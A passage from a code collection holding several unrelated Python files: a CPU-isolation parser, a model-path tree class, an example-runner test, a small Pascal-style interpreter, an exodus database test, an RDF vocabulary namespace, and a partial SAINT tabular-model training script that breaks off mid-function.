with open(os.path.join(proc.procfs(), "cmdline")) as f:
return parse_isolcpus(f.read())
# Returns list of isolated cpu ids from /proc/cmdline content.
def parse_isolcpus(cmdline):
cpus = []
# Ensure that newlines are removed.
cmdline_stripped = cmdline.rstrip()
cmdline_fields = cmdline_stripped.split()
for cmdline_field in cmdline_fields:
pair = cmdline_field.split("=")
if len(pair) != 2:
continue
key = pair[0]
value = pair[1]
if key == "isolcpus":
cpus_str = value.split(",")
for cpu_id in cpus_str:
cpus.append(int(cpu_id))
return cpus
|
StarcoderdataPython
|
1712989
|
<filename>src/modelpath.py
from functools import reduce
import re
class ModelPath:
R = re.compile(r"[\/\\]")
EXTENSION = ".mdl"
def __init__(self, key):
self.key = key
self.models = []
self.subpaths = {}
def addSubPath(self,subdir):
self.subpaths[subdir.key] = subdir
def addModel(self,path,split=None):
if split is None:
split = ModelPath.R.split(path)
if len(split) == 1:
if not path in self.models:
self.models.append(path)
else:
if not split[0] in self:
childPath = ModelPath(split[0])
self.addSubPath(childPath)
else:
childPath = self.getSubPath(split[0])
childPath.addModel(path,split=split[1:])
def getSubPath(self,key):
return self.subpaths[key]
def removeModel(self,model):
self.models.remove(model)
def popModel(self,index):
return self.models.pop(index)
def __len__(self):
length = len(self.models)
for path in self.subpaths:
length += len(path)
return length
def __as_string(self,tabs = 0):
newtabs = tabs + 1
s = "".join(["\t" for i in range(tabs)])
s += "\"" + self.key + "\" {"
if len(self.models) > 0:
s += "\n"
s += "".join(["\t" for i in range(newtabs)])
s += str(self.models) + "\n"
if len(self.subpaths) > 0:
s += "\n"
s += "".join(["\t" for i in range(newtabs)])
for key in self.subpaths:
sub = self.subpaths[key]
s += sub.__as_string(newtabs)
s += "".join(["\t" for i in range(tabs)])
s += "}\n"
return s
def __str__(self):
return self.__as_string()
def __contains__(self,key):
if key.endswith(ModelPath.EXTENSION):
return key in self.models
else:
return key in self.subpaths
|
StarcoderdataPython
|
1609502
|
<gh_stars>0
import pathlib
import subprocess
import pytest
official_examples = [
(
"tutorials/mnist_pytorch",
"tutorials/mnist_pytorch/const.yaml",
),
(
"tutorials/fashion_mnist_tf_keras",
"tutorials/fashion_mnist_tf_keras/const.yaml",
),
(
"tutorials/imagenet_pytorch",
"tutorials/imagenet_pytorch/const_cifar.yaml",
),
(
"computer_vision/cifar10_pytorch",
"computer_vision/cifar10_pytorch/const.yaml",
),
(
"computer_vision/mnist_estimator",
"computer_vision/mnist_estimator/const.yaml",
),
(
"computer_vision/mnist_tf_layers",
"computer_vision/mnist_tf_layers/const.yaml",
),
(
"computer_vision/cifar10_tf_keras",
"computer_vision/cifar10_tf_keras/const.yaml",
),
(
"computer_vision/iris_tf_keras",
"computer_vision/iris_tf_keras/const.yaml",
),
(
"gan/gan_mnist_pytorch",
"gan/gan_mnist_pytorch/const.yaml",
),
(
"gan/dcgan_tf_keras",
"gan/dcgan_tf_keras/const.yaml",
),
(
"gan/pix2pix_tf_keras",
"gan/pix2pix_tf_keras/const.yaml",
),
(
"decision_trees/gbt_titanic_estimator",
"decision_trees/gbt_titanic_estimator/const.yaml",
),
(
"features/custom_reducers_mnist_pytorch",
"features/custom_reducers_mnist_pytorch/const.yaml",
),
]
@pytest.mark.parametrize("model_def,config_file", official_examples)
def test_official(model_def: str, config_file: str) -> None:
examples_dir = pathlib.Path(__file__).parent.parent
model_def_absolute = examples_dir.joinpath(model_def)
config_file_absolute = examples_dir.joinpath(config_file)
startup_hook = model_def_absolute.joinpath("startup-hook.sh")
if startup_hook.exists():
subprocess.check_output(("sh", str(startup_hook)))
subprocess.check_output(
(
"det",
"experiment",
"create",
"--local",
"--test",
str(config_file_absolute),
str(model_def_absolute),
)
)
|
StarcoderdataPython
|
1782962
|
from . import astree
from .lexer import Lexer
from . import tok
# rules:
# factor: INTEGER | variable
# value: factor | paren | (PLUS | MINUS) value
# paren: LPAREN expr RPAREN
# power: value (POW value)*
# mul: power ((MUL | DIV) power)*
# addition: mul ((PLUS | MINUS) mul)*
# expr: additon
# pascal rules
# program: compound_block DOT
# compound_block = BEGIN block END
# block: statements | statements SEMI block
# statements: empty | assignment | compound_block
# assignment: variable ASSIGN expr
# variable: id
# empty:
# expr: see above
class Interpreter:
def __init__(self, lexer: Lexer):
self.lexer = lexer
# set current token to the first token taken from the input
self.current_token = self.lexer.get_next_token()
def error(self):
raise Exception('Invalid syntax')
def eat(self, token_type):
# compare the current token type with the passed token
# type and if they match then "eat" the current token
# and assign the next token to the self.current_token,
# otherwise raise an exception.
print('current token: ', self.current_token, ' required token: ', token_type)
if self.current_token.type == token_type:
self.current_token = self.lexer.get_next_token()
else:
self.error()
def integer(self) -> astree.AST:
"""Return an INTEGER token value.
factor : INTEGER
"""
token = self.current_token
self.eat(tok.INTEGER)
return astree.Num(token)
def variable(self) -> astree.AST:
token = self.current_token
self.eat(tok.VAR)
return astree.Variable(token)
def assignment(self) -> astree.AST:
"""Return an assignment AST
assignment: variable ASSIGN expr
"""
var = self.variable()
self.eat(tok.ASSIGN)
expr = self.expr()
return astree.Assign(var, expr)
def value(self) -> astree.AST:
"""value parser / interpreter.
value: factor | paren
"""
if self.current_token.type == tok.INTEGER:
return self.integer()
if self.current_token.type == tok.VAR:
return self.variable()
if self.current_token.type == tok.LPAREN:
return self.paren()
if self.current_token.type == tok.PLUS:
self.eat(tok.PLUS)
return astree.UnaryOp_PLUS(self.value())
if self.current_token.type == tok.MINUS:
self.eat(tok.MINUS)
return astree.UnaryOp_MINUS(self.value())
def paren(self) -> astree.AST:
"""Parenthesis parser / interpreter.
paren: LPAREN term1 RPAREN
term1: addition
"""
self.eat(tok.LPAREN)
result = self.addition()
self.eat(tok.RPAREN)
return result
def power(self) -> astree.AST:
"""Power parser / interpreter
power: value (POW value)*
"""
result = self.value()
while self.current_token.type == tok.POW:
self.eat(tok.POW)
result = astree.BinOp_POW(result, self.value())
return result
def mul(self) -> astree.AST:
"""Arithmetic expression parser / interpreter.
mul: value ((MUL | DIV) value)*
"""
result = self.power()
while self.current_token.type in (tok.MUL, tok.DIV):
token = self.current_token
if token.type == tok.MUL:
self.eat(tok.MUL)
result = astree.BinOp_MUL(result, self.power())
elif token.type == tok.DIV:
self.eat(tok.DIV)
result = astree.BinOp_DIV(result, self.power())
return result
def addition(self) -> astree.AST:
"""Arithmetic expression parser / interpreter.
addition: mul ((PLUS | MINUS) mul)*
"""
result = self.mul()
while self.current_token.type in (tok.PLUS, tok.MINUS):
token = self.current_token
if token.type == tok.PLUS:
self.eat(tok.PLUS)
result = astree.BinOp_PLUS(result, self.mul())
elif token.type == tok.MINUS:
self.eat(tok.MINUS)
result = astree.BinOp_MINUS(result, self.mul())
return result
def expr(self) -> astree.AST:
result = self.addition()
return result
def program(self) -> astree.AST:
result = self.compound_block()
self.eat(tok.DOT)
self.eat(tok.EOF)
return result
def compound_block(self) -> astree.AST:
self.eat(tok.BEG)
result = self.block()
self.eat(tok.END)
return result
def block(self) -> astree.AST:
result = self.statements()
while self.current_token.type == tok.SEMI:
self.eat(tok.SEMI)
next = self.statements()
result = astree.Sequence(result, next)
return result
def statements(self) -> astree.AST:
if self.current_token.type == tok.BEG:
return self.compound_block()
if self.current_token.type == tok.VAR:
return self.assignment()
else:
return self.empty()
def empty(self) -> astree.AST:
return astree.Empty()
|
StarcoderdataPython
|
1742679
|
<gh_stars>0
#!/usr/bin/env python
"""
Test routine for SEACAS exodus.py module
"""
import exodus
DATABASE_PATH = "baseline.g"
# Test outputing c-type arrays and numpy arrays
ARRAY_TYPES = ['ctype', 'numpy']
for array_type in ARRAY_TYPES:
EXO = exodus.exodus(DATABASE_PATH, array_type=array_type)
print("Exodus file has title:", EXO.title())
print("Exodus file has", EXO.num_dimensions(), "dimensions")
print("Exodus file has", EXO.num_nodes(), "nodes")
print("Exodus file has", EXO.num_elems(), "elements")
print("Exodus file has", EXO.num_blks(), "blocks")
print("Exodus file has", EXO.num_node_sets(), "node sets")
print("Exodus file has", EXO.num_side_sets(), "side sets")
print("Exodus file has", EXO.num_times(), "time steps")
if EXO.num_times() > 0:
TIMES = EXO.get_times()
for time in TIMES:
print("time = ", time)
BLOCKS = EXO.get_elem_blk_ids()
for block in BLOCKS:
name = EXO.get_elem_blk_name(block)
print("block id = {}, name = {}".format(block, name))
SIDESETS = EXO.get_side_set_ids()
for sideset in SIDESETS:
print("side set id = ", sideset)
NODESETS = EXO.get_node_set_ids()
for nodeset in NODESETS:
print("node set id = ", nodeset)
COORDINATES = EXO.get_coords()
print("Local Node Id 1 has COORDINATES: {} {} {}"
.format(COORDINATES[0][0], COORDINATES[1][0], COORDINATES[2][0]))
NN = (EXO.num_nodes() - 1)
print("Local Node Id {} has COORDINATES: {} {} {}"
.format(EXO.num_nodes(), COORDINATES[0][NN], COORDINATES[1][NN], COORDINATES[2][NN]))
print("Side Set Variable Names")
SSVARNAMES = EXO.get_side_set_variable_names()
for name in SSVARNAMES:
print("ssvar = ", name)
print("Side Set Cosa Variable Values")
step = 1
if EXO.num_times() > 0:
for time in TIMES:
print("time = ", time)
ssvals = EXO.get_side_set_variable_values(1, "cosa", step)
for ssval in ssvals:
print("value =", ssval)
step += 1
EXO.close()
# Test reading in data from exodus database, and then copying it into another database
for array_type in ARRAY_TYPES:
new_DATABASE_PATH = DATABASE_PATH[:-2] + '_' + array_type + '_copy.e'
exodus.copyTransfer(DATABASE_PATH, new_DATABASE_PATH, array_type=array_type)
print("Database copied using " + array_type + " arrays.")
# Test the exodus.py `copy` function which calls the C API `ex_copy`
DB_PATH = "base_ioshell.g"
EXO = exodus.exodus(DB_PATH)
NEW_DATABASE_PATH = DB_PATH[:-2] + '_copy.e'
EXO_COPY = EXO.copy(NEW_DATABASE_PATH, True)
EXO_COPY.summarize()
print("Exodus file has", EXO_COPY.num_blks(), "blocks")
BLOCKS = EXO_COPY.get_elem_blk_ids()
for block in BLOCKS:
name = EXO_COPY.get_elem_blk_name(block)
print("\tblock id = {}, name = {}".format(block, name))
print("Exodus file has", EXO_COPY.num_side_sets(), "side sets")
SIDESETS = EXO_COPY.get_side_set_ids()
for sideset in SIDESETS:
name = EXO_COPY.get_side_set_name(sideset)
print("\tside set id = {}, name = {}".format(sideset, name))
print("Exodus file has", EXO_COPY.num_node_sets(), "node sets")
NODESETS = EXO_COPY.get_node_set_ids()
for nodeset in NODESETS:
name = EXO_COPY.get_node_set_name(nodeset)
print("\tnode set id = {}, name = {}".format(nodeset, name))
COORDINATES = EXO_COPY.get_coords()
print("Local Node Id 1 has COORDINATES: {} {} {}"
.format(COORDINATES[0][0], COORDINATES[1][0], COORDINATES[2][0]))
NN = (EXO_COPY.num_nodes() - 1)
print("Local Node Id {} has COORDINATES: {} {} {}"
.format(EXO_COPY.num_nodes(), COORDINATES[0][NN], COORDINATES[1][NN], COORDINATES[2][NN]))
print("Exodus file has", EXO_COPY.num_times(), "time steps")
if EXO_COPY.num_times() > 0:
TIMES = EXO_COPY.get_times()
for time in TIMES:
print("\ttime = ", time)
SSVARNAMES = EXO_COPY.get_side_set_variable_names()
print("Side Set Variable Names:")
for name in SSVARNAMES:
print("\tSideSet Variable = ", name)
step = 2
ssvals = EXO_COPY.get_side_set_variable_values(2, "SideBlock_2", step)
EXO_COPY.close()
|
StarcoderdataPython
|
1642021
|
from rdflib.term import URIRef
from rdflib.namespace import DefinedNamespace, Namespace
class DCTERMS(DefinedNamespace):
"""
DCMI Metadata Terms - other
Generated from: https://www.dublincore.org/specifications/dublin-core/dcmi-terms/dublin_core_terms.ttl
Date: 2020-05-26 14:20:00.590514
"""
_fail = True
# http://purl.org/dc/dcam/VocabularyEncodingScheme
DCMIType: URIRef # The set of classes specified by the DCMI Type Vocabulary, used to categorize the nature or genre of the resource.
DDC: URIRef # The set of conceptual resources specified by the Dewey Decimal Classification.
IMT: URIRef # The set of media types specified by the Internet Assigned Numbers Authority.
LCC: URIRef # The set of conceptual resources specified by the Library of Congress Classification.
LCSH: URIRef # The set of labeled concepts specified by the Library of Congress Subject Headings.
MESH: URIRef # The set of labeled concepts specified by the Medical Subject Headings.
NLM: URIRef # The set of conceptual resources specified by the National Library of Medicine Classification.
TGN: URIRef # The set of places specified by the Getty Thesaurus of Geographic Names.
UDC: URIRef # The set of conceptual resources specified by the Universal Decimal Classification.
# http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
abstract: URIRef # A summary of the resource.
accessRights: URIRef # Information about who access the resource or an indication of its security status.
accrualMethod: URIRef # The method by which items are added to a collection.
accrualPeriodicity: URIRef # The frequency with which items are added to a collection.
accrualPolicy: URIRef # The policy governing the addition of items to a collection.
alternative: URIRef # An alternative name for the resource.
audience: URIRef # A class of agents for whom the resource is intended or useful.
available: URIRef # Date that the resource became or will become available.
bibliographicCitation: URIRef # A bibliographic reference for the resource.
conformsTo: URIRef # An established standard to which the described resource conforms.
contributor: URIRef # An entity responsible for making contributions to the resource.
coverage: URIRef # The spatial or temporal topic of the resource, spatial applicability of the resource, or jurisdiction under which the resource is relevant.
created: URIRef # Date of creation of the resource.
creator: URIRef # An entity responsible for making the resource.
date: URIRef # A point or period of time associated with an event in the lifecycle of the resource.
dateAccepted: URIRef # Date of acceptance of the resource.
dateCopyrighted: URIRef # Date of copyright of the resource.
dateSubmitted: URIRef # Date of submission of the resource.
description: URIRef # An account of the resource.
educationLevel: URIRef # A class of agents, defined in terms of progression through an educational or training context, for which the described resource is intended.
extent: URIRef # The size or duration of the resource.
format: URIRef # The file format, physical medium, or dimensions of the resource.
hasFormat: URIRef # A related resource that is substantially the same as the pre-existing described resource, but in another format.
hasPart: URIRef # A related resource that is included either physically or logically in the described resource.
hasVersion: URIRef # A related resource that is a version, edition, or adaptation of the described resource.
identifier: URIRef # An unambiguous reference to the resource within a given context.
instructionalMethod: URIRef # A process, used to engender knowledge, attitudes and skills, that the described resource is designed to support.
isFormatOf: URIRef # A pre-existing related resource that is substantially the same as the described resource, but in another format.
isPartOf: URIRef # A related resource in which the described resource is physically or logically included.
isReferencedBy: URIRef # A related resource that references, cites, or otherwise points to the described resource.
isReplacedBy: URIRef # A related resource that supplants, displaces, or supersedes the described resource.
isRequiredBy: URIRef # A related resource that requires the described resource to support its function, delivery, or coherence.
isVersionOf: URIRef # A related resource of which the described resource is a version, edition, or adaptation.
issued: URIRef # Date of formal issuance of the resource.
language: URIRef # A language of the resource.
license: URIRef # A legal document giving official permission to do something with the resource.
mediator: URIRef # An entity that mediates access to the resource.
medium: URIRef # The material or physical carrier of the resource.
modified: URIRef # Date on which the resource was changed.
provenance: URIRef # A statement of any changes in ownership and custody of the resource since its creation that are significant for its authenticity, integrity, and interpretation.
publisher: URIRef # An entity responsible for making the resource available.
references: URIRef # A related resource that is referenced, cited, or otherwise pointed to by the described resource.
relation: URIRef # A related resource.
replaces: URIRef # A related resource that is supplanted, displaced, or superseded by the described resource.
requires: URIRef # A related resource that is required by the described resource to support its function, delivery, or coherence.
rights: URIRef # Information about rights held in and over the resource.
rightsHolder: URIRef # A person or organization owning or managing rights over the resource.
source: URIRef # A related resource from which the described resource is derived.
spatial: URIRef # Spatial characteristics of the resource.
subject: URIRef # A topic of the resource.
tableOfContents: URIRef # A list of subunits of the resource.
temporal: URIRef # Temporal characteristics of the resource.
title: URIRef # A name given to the resource.
type: URIRef # The nature or genre of the resource.
valid: URIRef # Date (often a range) of validity of a resource.
# http://www.w3.org/2000/01/rdf-schema#Class
Agent: URIRef # A resource that acts or has the power to act.
AgentClass: URIRef # A group of agents.
BibliographicResource: URIRef # A book, article, or other documentary resource.
FileFormat: URIRef # A digital resource format.
Frequency: URIRef # A rate at which something recurs.
Jurisdiction: URIRef # The extent or range of judicial, law enforcement, or other authority.
LicenseDocument: URIRef # A legal document giving official permission to do something with a resource.
LinguisticSystem: URIRef # A system of signs, symbols, sounds, gestures, or rules used in communication.
Location: URIRef # A spatial region or named place.
LocationPeriodOrJurisdiction: URIRef # A location, period of time, or jurisdiction.
MediaType: URIRef # A file format or physical medium.
MediaTypeOrExtent: URIRef # A media type or extent.
MethodOfAccrual: URIRef # A method by which resources are added to a collection.
MethodOfInstruction: URIRef # A process that is used to engender knowledge, attitudes, and skills.
PeriodOfTime: URIRef # An interval of time that is named or defined by its start and end dates.
PhysicalMedium: URIRef # A physical material or carrier.
PhysicalResource: URIRef # A material thing.
Policy: URIRef # A plan or course of action by an authority, intended to influence and determine decisions, actions, and other matters.
ProvenanceStatement: URIRef # Any changes in ownership and custody of a resource since its creation that are significant for its authenticity, integrity, and interpretation.
RightsStatement: URIRef # A statement about the intellectual property rights (IPR) held in or over a resource, a legal document giving official permission to do something with a resource, or a statement about access rights.
SizeOrDuration: URIRef # A dimension or extent, or a time taken to play or execute.
Standard: URIRef # A reference point against which other things can be evaluated or compared.
# http://www.w3.org/2000/01/rdf-schema#Datatype
Box: URIRef # The set of regions in space defined by their geographic coordinates according to the DCMI Box Encoding Scheme.
ISO3166: URIRef # The set of codes listed in ISO 3166-1 for the representation of names of countries.
Period: URIRef # The set of time intervals defined by their limits according to the DCMI Period Encoding Scheme.
Point: URIRef # The set of points in space defined by their geographic coordinates according to the DCMI Point Encoding Scheme.
RFC1766: URIRef # The set of tags, constructed according to RFC 1766, for the identification of languages.
RFC3066: URIRef # The set of tags constructed according to RFC 3066 for the identification of languages.
RFC4646: URIRef # The set of tags constructed according to RFC 4646 for the identification of languages.
RFC5646: URIRef # The set of tags constructed according to RFC 5646 for the identification of languages.
URI: URIRef # The set of identifiers constructed according to the generic syntax for Uniform Resource Identifiers as specified by the Internet Engineering Task Force.
W3CDTF: URIRef # The set of dates and times constructed according to the W3C Date and Time Formats Specification.
# Valid non-python identifiers
_extras = ['ISO639-2', 'ISO639-3']
_NS = Namespace("http://purl.org/dc/terms/")
|
StarcoderdataPython
|
1653502
|
<reponame>ralbuyeh-figure/saint
import torch
from torch import nn
from models import SAINT
from data_openml import data_prep_openml,task_dset_ids,DataSetCatCon
import argparse
from torch.utils.data import DataLoader
import torch.optim as optim
from utils import count_parameters, classification_scores, mean_sq_error
from augmentations import embed_data_mask
from augmentations import add_noise
import os
import numpy as np
class FakeParser:
pass
# Driver's code
opt = FakeParser()
opt.dset_id = 1461
opt.task = "binary"
opt.attentiontype = "colrow"
opt.cont_embeddings = "MLP"
opt.vision_dset = False
opt.embedding_size = 32
opt.transformer_depth = 6
opt.attention_heads = 8
opt.attention_dropout = 0.1
opt.ff_dropout = 0.1
opt.attentiontype = "colrow"
opt.optimizer = "AdamW"
#parser = argparse.ArgumentParser()
#parser.add_argument('--dset_id', required=True, type=int)
#parser.add_argument('--vision_dset', action = 'store_true')
#parser.add_argument('--task', required=True, type=str,choices = ['binary','multiclass','regression'])
#parser.add_argument('--cont_embeddings', default='MLP', type=str,choices = ['MLP','Noemb','pos_singleMLP'])
#parser.add_argument('--embedding_size', default=32, type=int)
#parser.add_argument('--transformer_depth', default=6, type=int)
#parser.add_argument('--attention_heads', default=8, type=int)
#parser.add_argument('--attention_dropout', default=0.1, type=float)
#parser.add_argument('--ff_dropout', default=0.1, type=float)
#parser.add_argument('--attentiontype', default='colrow', type=str,choices = ['col','colrow','row','justmlp','attn','attnmlp'])
#parser.add_argument('--optimizer', default='AdamW', type=str,choices = ['AdamW','Adam','SGD'])
opt.scheduler = "cosine"
#parser.add_argument('--scheduler', default='cosine', type=str,choices = ['cosine','linear'])
opt.lr = 0.0001
#parser.add_argument('--lr', default=0.0001, type=float)
opt.epochs = 100
#parser.add_argument('--epochs', default=100, type=int)
opt.batchsize = 256
#parser.add_argument('--batchsize', default=256, type=int)
opt.savemodelroot = "./bestmodels"
#parser.add_argument('--savemodelroot', default='./bestmodels', type=str)
opt.run_name = "testrun"
#parser.add_argument('--run_name', default='testrun', type=str)
opt.set_seed = 1
#parser.add_argument('--set_seed', default= 1 , type=int)
opt.dset_seed = 5
#parser.add_argument('--dset_seed', default= 5 , type=int)
opt.active_log = True
#parser.add_argument('--active_log', action = 'store_true')
opt.pretrain = True
#parser.add_argument('--pretrain', action = 'store_true')
opt.pretrain_epochs = 50
#parser.add_argument('--pretrain_epochs', default=50, type=int)
opt.pt_tasks = ["contrastive", "denoising"]
#parser.add_argument('--pt_tasks', default=['contrastive','denoising'], type=str,nargs='*',choices = ['contrastive','contrastive_sim','denoising'])
opt.pt_aug = []
#parser.add_argument('--pt_aug', default=[], type=str,nargs='*',choices = ['mixup','cutmix'])
opt.pt_aug_lam = 0.1
#parser.add_argument('--pt_aug_lam', default=0.1, type=float)
opt.mixup_lam = 0.3
#parser.add_argument('--mixup_lam', default=0.3, type=float)
opt.train_mask_prob = 0
#parser.add_argument('--train_mask_prob', default=0, type=float)
opt.mask_prob = 0
#parser.add_argument('--mask_prob', default=0, type=float)
opt.ssl_avail_y = 0
#parser.add_argument('--ssl_avail_y', default= 0, type=int)
opt.pt_projhead_style = "diff"
#parser.add_argument('--pt_projhead_style', default='diff', type=str,choices = ['diff','same','nohead'])
opt.nce_temp = 0.7
#parser.add_argument('--nce_temp', default=0.7, type=float)
opt.lam0 = 0.5
opt.lam1 = 10
opt.lam2 = 1
opt.lam3 = 10
opt.final_mlp_style = "sep"
#parser.add_argument('--lam0', default=0.5, type=float)
#parser.add_argument('--lam1', default=10, type=float)
#parser.add_argument('--lam2', default=1, type=float)
#parser.add_argument('--lam3', default=10, type=float)
#parser.add_argument('--final_mlp_style', default='sep', type=str,choices = ['common','sep'])
#opt = parser.parse_args()
modelsave_path = os.path.join(os.getcwd(),opt.savemodelroot,opt.task,str(opt.dset_id),opt.run_name)
if opt.task == 'regression':
opt.dtask = 'reg'
else:
opt.dtask = 'clf'
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(f"Device is {device}.")
torch.manual_seed(opt.set_seed)
os.makedirs(modelsave_path, exist_ok=True)
if opt.active_log:
import wandb
if opt.pretrain:
wandb.init(project="saint_v2_all", group =opt.run_name ,name = f'pretrain_{opt.task}_{str(opt.attentiontype)}_{str(opt.dset_id)}_{str(opt.set_seed)}')
else:
if opt.task=='multiclass':
wandb.init(project="saint_v2_all_kamal", group =opt.run_name ,name = f'{opt.task}_{str(opt.attentiontype)}_{str(opt.dset_id)}_{str(opt.set_seed)}')
else:
wandb.init(project="saint_v2_all", group =opt.run_name ,name = f'{opt.task}_{str(opt.attentiontype)}_{str(opt.dset_id)}_{str(opt.set_seed)}')
#### gutting the data preprocessing
import openml
import numpy as np
from sklearn.preprocessing import LabelEncoder
import pandas as pd
from torch.utils.data import Dataset
ds_id = opt.dset_id
seed = opt.dset_seed
task = opt.task
datasplit=[.65, .15, .2]
np.random.seed(seed)
dataset = openml.datasets.get_dataset(ds_id)
X, y, categorical_indicator, attribute_names = dataset.get_data(dataset_format="dataframe",
target=dataset.default_target_attribute)
# x is a pandas dataframe with a bunch of features, mixed continuous and float
# y is a pandas series with distinct caegories, '1' and '2'
# categorical indicator is a list of booleans where the value corresponds to the column index
# attribute names is like above but with names in place of boolean
if ds_id == 42178:
categorical_indicator = [True, False, True, True, False, True, True, True, True, True, True, True, True, True, True,
True, True, False, False]
tmp = [x if (x != ' ') else '0' for x in X['TotalCharges'].tolist()]
X['TotalCharges'] = [float(i) for i in tmp]
y = y[X.TotalCharges != 0]
X = X[X.TotalCharges != 0]
X.reset_index(drop=True, inplace=True)
print(y.shape, X.shape)
if ds_id in [42728, 42705, 42729, 42571]:
# import ipdb; ipdb.set_trace()
X, y = X[:50000], y[:50000]
X.reset_index(drop=True, inplace=True)
categorical_columns = X.columns[list(np.where(np.array(categorical_indicator) == True)[0])].tolist()
# this just specifies the categorical column names
cont_columns = list(set(X.columns.tolist()) - set(categorical_columns))
# this is the continuous columns, the disjoint of feature names where you remove the categorical columsn or whatever
cat_idxs = list(np.where(np.array(categorical_indicator) == True)[0])
# indexes of categorical columns.. for some reason
con_idxs = list(set(range(len(X.columns))) - set(cat_idxs))
# indexes of continuous columns
for col in categorical_columns:
X[col] = X[col].astype("object")
# converting all the categoricals to type object
X["Set"] = np.random.choice(["train", "valid", "test"], p=datasplit, size=(X.shape[0],))
# apply train test val flag
train_indices = X[X.Set == "train"].index
valid_indices = X[X.Set == "valid"].index
test_indices = X[X.Set == "test"].index
# int64 index of the corresponding indices to flag
X = X.drop(columns=['Set'])
# drop that flag column
temp = X.fillna("MissingValue")
# fillna as other...
nan_mask = temp.ne("MissingValue").astype(int)
# returns a dataframe of 1s where value is not missing value... so mostly a matrix of 1s.
cat_dims = []
for col in categorical_columns:
# X[col] = X[col].cat.add_categories("MissingValue")
X[col] = X[col].fillna("MissingValue")
l_enc = LabelEncoder()
X[col] = l_enc.fit_transform(X[col].values)
cat_dims.append(len(l_enc.classes_))
# apply arbitrary integer values to categorical columns...
# cat dims is the number of distinct categories for each categorical column
# watch out here, they're not really being mindful of leakage.
for col in cont_columns:
# X[col].fillna("MissingValue",inplace=True)
X.fillna(X.loc[train_indices, col].mean(), inplace=True)
# mean impute the continuous columns... that's bad because i don't see them doing any of that using the training params
# on the val and test, we'll see
y = y.values
if task != 'regression':
l_enc = LabelEncoder()
y = l_enc.fit_transform(y)
# label encoding the y vector to be 0s and 1s..
def data_split(X, y, nan_mask, indices):
x_d = {
'data': X.values[indices],
'mask': nan_mask.values[indices]
}
if x_d['data'].shape != x_d['mask'].shape:
raise 'Shape of data not same as that of nan mask!'
y_d = {
'data': y[indices].reshape(-1, 1)
}
return x_d, y_d
# above function returns x_d which is a dictionary of numpy array of x data values, and then the mask, and then
# row filtered based on an index
X_train, y_train = data_split(X, y, nan_mask, train_indices)
X_valid, y_valid = data_split(X, y, nan_mask, valid_indices)
X_test, y_test = data_split(X, y, nan_mask, test_indices)
train_mean, train_std = np.array(X_train['data'][:, con_idxs], dtype=np.float32).mean(0), np.array(
X_train['data'][:, con_idxs], dtype=np.float32).std(0)
train_std = np.where(train_std < 1e-6, 1e-6, train_std)
# import ipdb; ipdb.set_trace()
####DONE
print('Downloading and processing the dataset, it might take some time.')
#cat_dims, cat_idxs, con_idxs, X_train, y_train, X_valid, y_valid, X_test, y_test, train_mean, train_std = data_prep_openml(opt.dset_id, opt.dset_seed,opt.task, datasplit=[.65, .15, .2])
# I scrubbed the above line because I gutted it in the above section
continuous_mean_std = np.array([train_mean,train_std]).astype(np.float32)
##### Setting some hyperparams based on inputs and dataset
_,nfeat = X_train['data'].shape
# this just gets the number of features in the x matrix
if nfeat > 100:
opt.embedding_size = min(8,opt.embedding_size)
opt.batchsize = min(64, opt.batchsize)
if opt.attentiontype != 'col':
opt.transformer_depth = 1
opt.attention_heads = min(4,opt.attention_heads)
opt.attention_dropout = 0.8
opt.embedding_size = min(32,opt.embedding_size)
opt.ff_dropout = 0.8
print(nfeat,opt.batchsize)
print(opt)
if opt.active_log:
wandb.config.update(opt)
##### gutting the datasetcatcon class
# # class DataSetCatCon(Dataset):
# # def __init__(self, X, Y, cat_cols, task='clf', continuous_mean_std=None):
#
# _X = X_train
# # that data dict thing
# _Y = y_train
# # the y dict
# _cat_cols = cat_idxs
# # indices of categorical columns
# _task = opt.dtask
# # 'clf' in our case
# _continuous_mean_std = continuous_mean_std
#
# _cat_cols = list(_cat_cols)
# # redundant
# _X_mask = _X['mask'].copy()
# # getting the mask of that data dict
# _X = _X['data'].copy()
# # getting the X element of that data dict
# _con_cols = list(set(np.arange(_X.shape[1])) - set(_cat_cols))
# # the continuous column indices
# _X1 = _X[:, _cat_cols].copy().astype(np.int64) # categorical columns
# # broken off categorical columns
# _X2 = _X[:, _con_cols].copy().astype(np.float32) # numerical columns
# # broken off numerical columns
#
# _X1_mask = _X_mask[:, _cat_cols].copy().astype(np.int64) # categorical columns
# # broken off categorical missing value mask
#
# _X2_mask = _X_mask[:, _con_cols].copy().astype(np.int64) # numerical columns
# # broken off numerical missing value mask
#
# if task == 'clf':
# _y = _Y['data'] # .astype(np.float32)
# else:
# _y = _Y['data'].astype(np.float32)
# # just grabbing that y vector
#
# _cls = np.zeros_like(_y, dtype=int)
# # get a bunch of zeros in the same dimensionality as y vector
#
# _cls_mask = np.ones_like(_y, dtype=int)
# # get a bunch of ones in same dimensionality as y vector
#
#
# if continuous_mean_std is not None:
# _mean, _std = continuous_mean_std
# _X2 = (_X2 - _mean) / _std
# z normalize only the continuous x columns
#
# # def __len__(self):
# return len(self.y)
#
# # def __getitem__(self, idx):
# # X1 has categorical data, X2 has continuous
# return np.concatenate((self.cls[idx], self.X1[idx])), self.X2[idx], self.y[idx], np.concatenate(
# (self.cls_mask[idx], self.X1_mask[idx])), self.X2_mask[idx]
# note that they are not converting it to a torch tensor.. they must do it at some point...
train_ds = DataSetCatCon(X_train, y_train, cat_idxs,opt.dtask,continuous_mean_std)
trainloader = DataLoader(train_ds, batch_size=opt.batchsize, shuffle=True,num_workers=4)
# a single element looks like this:
# (array([0, 4, 1, 2, 0, 1, 0, 2, 8, 3]),
# this one is like the categorical vector, with a leading zero appended to it. Andrew suggests it might be the token they mention in the paper
# array([ 1.5994084 , 0.25852484, -1.2972844 , 0.01338016, -0.5672942 ,
# -0.41616383, -0.2361183 ], dtype=float32),
# this one is the continuous element of the vector
# array([0]),
# this is the y-element of a vector
# array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1]),
# │broken off categorical missing value mask with a leading 1 appended to it. that's because that 0 element is not missing
# array([1, 1, 1, 1, 1, 1, 1]))
# broken off numerical missing value mask
valid_ds = DataSetCatCon(X_valid, y_valid, cat_idxs,opt.dtask, continuous_mean_std)
validloader = DataLoader(valid_ds, batch_size=opt.batchsize, shuffle=False,num_workers=4)
test_ds = DataSetCatCon(X_test, y_test, cat_idxs,opt.dtask, continuous_mean_std)
testloader = DataLoader(test_ds, batch_size=opt.batchsize, shuffle=False,num_workers=4)
if opt.task == 'regression':
